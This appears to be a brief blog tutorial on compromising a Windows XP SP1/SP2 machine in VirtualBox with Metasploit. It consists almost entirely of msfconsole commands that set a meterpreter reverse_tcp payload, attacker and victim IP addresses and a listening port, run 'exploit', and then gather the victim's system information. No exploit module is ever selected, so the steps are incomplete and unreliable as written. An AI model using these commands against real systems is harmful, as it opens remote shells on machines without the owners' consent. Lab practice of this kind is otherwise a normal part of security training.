Hacking Windows XP(Sp1,Sp2)
Step 1:
Boot up Windows Xp(Sp1,Sp2) in virtual box:
Step 2:
Open a new terminal and type "msfconsole"
Step 3:
Type Following commands:
set payload windows/meterpreter/reverse_tcp
set lhost <attacker IP address>
set rhost <victim's IP address>
set lport 4444
exploit
Step 4:
After getting the meterpreter session type "sysinfo" to view the victim's detail.
Comments
Post a Comment